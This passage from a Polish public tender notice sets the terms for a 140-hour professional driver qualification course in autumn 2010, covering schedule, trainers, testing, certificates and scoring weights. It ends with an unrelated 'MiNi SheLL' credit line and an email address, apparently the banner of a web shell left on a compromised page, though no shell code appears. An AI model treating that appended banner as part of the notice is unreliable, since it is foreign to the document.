w Rozporządzeniu Ministra Infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. Nr 53, poz. 314). Szkolenie powinno być realizowane w miejscowości, do której jest możliwy dojazd środkami transportu zbiorowego w godzinach umożliwiających efektywną realizację szkolenia (dojazd na szkolenie i z powrotem nie powinien przekraczać 3 godzin dziennie). W przypadku realizacji zajęć dotyczących jazdy w warunkach specjalnych dojazd uczestników do tego miejsca zapewni Wykonawca wykazując koszt w kalkulacji szkolenia.
2.	Termin szkolenia: październik/listopad 2010 r. 
Proponowana data rozpoczęcia szkolenia 18.10.2010 r. 
Liczba dni szkolenia: max 30 dni szkoleniowych. Ostateczny termin realizacji szkolenia do 30.11.2010 r. Test kwalifikacyjny należy przeprowadzić w najbliższym terminie po realizacji szkolenia (nie później niż 14 dni od dnia zakończenia szkolenia).
3.	Wymagana liczba realizowanych godzin zajęć dziennie: zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010 r. (Dz. U. Nr 53, poz. 314)
4.	Harmonogram szkolenia powinien obejmować dni powszednie poniedziałek - piątek. Dopuszcza się realizację zadań w soboty. Zajęcia powinny rozpoczynać się w godzinach porannych. 
5.	Ilość uczestników szkolenia: 6 osób. 
Zajęcia odbywać się powinny w 1 grupie szkoleniowej. Dopuszcza się podział na grupy 
w przypadku realizacji zajęć praktycznych.
6.	Łączna liczba godzin zegarowych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: 140 godzin 
7.	Program kursu  powinien być zgodny z Rozporządzeniem Ministra Infrastruktury z dnia 
1 kwietnia 2010 r. (Dz. U. Nr 53, poz. 314)
8.	Wykonawca zapewni uczestnikom na czas trwania szkolenia konieczny sprzęt oraz bazę lokalową zapewniając warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy 
i p. poż. 
9.	Wykonawca zapewni uczestnikom materiały szkoleniowe obejmujące zakres tematyczny szkolenia oraz przybory piśmiennicze przechodzące na własność uczestnika w postaci: notatnika, długopisu, nośnika informacji elektronicznej, itp.
10.	Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu powierzonych jej do realizacji modułów (zagadnień) ujętych w programie szkolenia. Wymaganym doświadczeniem każdego trenera jest przeprowadzenie co najmniej dwóch kursów z zakresu przedmiotu zamówienia. Wykonawca dołącza do oferty listę trenerów przewidzianych do realizacji przedmiotu zamówienia wraz z ich CV, z których powinno wynikać w sposób oczywisty spełnienie w/w warunków. 
Zmiana trenerów wskazanych do realizacji szkolenia możliwa jest tylko w sytuacjach uzasadnionych, których Wykonawca nie mógł przewidzieć i wymaga uzyskania zgody Zamawiającego. Wskazany trener musi posiadać kwalifikacje zgodne z w/w wymaganiami.
11.	Szkolenie powinno zakończyć się oceną nabytych umiejętności, przeprowadzeniem testu kwalifikacyjnego oraz wydaniem osobom szkolonym zaświadczeń o ukończeniu kursu na drukach, których wzór określa  Rozporządzenie Ministra Edukacji i Nauki z dn. 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216), a po pozytywnym wyniku testu kwalifikacyjnego wydaniem świadectwa kwalifikacji zawodowej, którego wzór określa załącznik nr 3 do Rozporządzenia Ministra Infrastruktury z dnia 
1 kwietnia 2010 r. (Dz. U. Nr 53, poz. 314). Wykonawca musi prowadzić rejestr wydanych zaświadczeń.
12.	W przypadku konieczności przeprowadzenia testu kwalifikacyjnego w innej miejscowości niż realizacja szkolenia dojazd uczestników organizuje i opłaca Wykonawca wykazując koszt w kalkulacji szkolenia. 
13.	Godziny przeznaczone na test kwalifikacyjny nie mogą być zrealizowane kosztem łącznej liczby godzin zegarowych przeznaczonych na realizację programu szkolenia, muszą stanowić godziny dodatkowe. Test kwalifikacyjny należy przeprowadzić niezwłocznie po zrealizowaniu programu szkolenia w najbliższym terminie po realizacji szkolenia (nie później niż 14 dni od dnia zakończenia szkolenia).
14.	Koszty testu kwalifikacyjnego muszą być uwzględnione w koszcie szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.60</li>
<li>2. Doświadczenie Wykonawcy w organizowaniu szkoleń objętych zamówieniem - 0.30</li>
<li>3. Posiadanie przez Wykonawcę certyfikatu jakości usług - 0.10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com